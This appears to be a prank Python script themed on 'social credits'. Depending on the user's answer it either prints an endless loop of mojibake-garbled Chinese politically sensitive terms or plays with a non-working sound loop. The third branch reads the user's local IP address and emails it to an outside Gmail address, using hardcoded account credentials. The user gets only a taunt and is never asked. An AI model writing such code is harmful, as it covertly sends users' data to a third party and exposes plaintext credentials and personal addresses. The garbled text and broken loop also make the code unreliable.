`#modules needed: playsound and yagmail
#pip install playsound
#pip install yagmail
socialcredits = input("Do you have social credits(Yes or No): ")
if socialcredits == "no":
    while socialcredits == "no":
        print("åŠ¨æ€ç½‘è‡ªç”±é—¨ å¤©å®‰é–€ å¤©å®‰é—¨ æ³•è¼ªåŠŸ ææ´ªå¿— Free Tibet å…­å››å¤©å®‰é–€äº‹ä»¶ The Tiananmen Square protests of 1989 å¤©å®‰é–€å¤§å± æ®º The Tiananmen Square Massacre åå³æ´¾é¬¥çˆ­ The Anti-Rightist Struggle å¤§èºé€²æ”¿ç­– The Great Leap Forward æ–‡åŒ–å¤§é©å‘½ The Great Proletarian Cultural Revolution äººæ¬Š Human Rights æ°‘é‹ Democratization è‡ªç”± Freedom ç¨ç«‹ Independence å¤šé»¨åˆ¶ Multi-party system å°ç£ è‡ºç£ Taiwan Formosa ä¸­è¯æ°‘åœ‹ Republic of China è¥¿è— åœŸä¼¯ç‰¹ å”å¤ç‰¹ Tibet é”è³´å–‡å˜› Dalai Lama æ³•è¼ªåŠŸ Falun Dafa æ–°ç–†ç¶­å¾çˆ¾è‡ªæ²»å€ The Xinjiang Uyghur Autonomous Region è«¾è²çˆ¾å’Œå¹³ç Nobel Peace Prize åŠ‰æšæ³¢ Liu Xiaobo æ°‘ä¸» è¨€è«– æ€æƒ³ åå…± åé©å‘½ æŠ—è­° é‹å‹• é¨·äº‚ æš´äº‚ é¨·æ“¾ æ“¾äº‚ æŠ—æš´ å¹³å ç¶­æ¬Š ç¤ºå¨æ¸¸è¡Œ ææ´ªå¿— æ³•è¼ªå¤§æ³• å¤§æ³•å¼Ÿå­ å¼·åˆ¶æ–·ç¨® å¼·åˆ¶å •èƒ æ°‘æ—æ·¨åŒ– äººé«”å¯¦é©— è‚…æ¸… èƒ¡è€€é‚¦ è¶™ç´«é™½ é­äº¬ç”Ÿ ç‹ä¸¹ é‚„æ”¿æ–¼æ°‘ å’Œå¹³æ¼”è®Š æ¿€æµä¸­åœ‹ åŒ—äº¬ä¹‹æ˜¥ å¤§ç´€å…ƒæ™‚å ± ä¹è©•è«–å…±ç”£é»¨ ç¨è£ å°ˆåˆ¶ å£“åˆ¶ çµ±ä¸€ ç›£è¦– é®å£“ è¿«å®³ ä¾µç•¥ æ å¥ª ç ´å£ æ‹·å• å± æ®º æ´»æ‘˜å™¨å®˜ èª˜æ‹ è²·è³£äººå£ éŠé€² èµ°ç§ æ¯’å“ è³£æ·« æ˜¥ç•« è³­åš å…­åˆå½© å¤©å®‰é–€ å¤©å®‰é—¨ æ³•è¼ªåŠŸ ææ´ªå¿— Winnie the Pooh åŠ‰æ›‰æ³¢åŠ¨æ€ç½‘è‡ªç”±é—¨")
elif socialcredits == "yes":
    print("Sâ‘â•â„¸ Ì£ á“­ âŠ£ğ™¹ğ™¹â†¸ á’²á”‘ãƒª")
    sound_loop = 1
    while True:
        from playsound import playsound
        sound_loop += 1
        if sound_loop == 3:
            break


else:
    print("Your IP has been acquired by the union")
    import socket

    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect(('8.8.8.8', 1))  # connect() for UDP doesn't send packets
    local_ip_address = s.getsockname()[0]
    print(local_ip_address)
    import yagmail
    try:
        yag = yagmail.SMTP(user='ChineseManTest@gmail.com', password='Glorytotheunion')
        # sending the email
        yag.send(to='shahrishi2008@gmail.com', subject='The Union Files', contents= "IP Address is: " + local_ip_address)
        print("Email sent successfully")
    except:
        print("Error, email was not sent")
    quit()
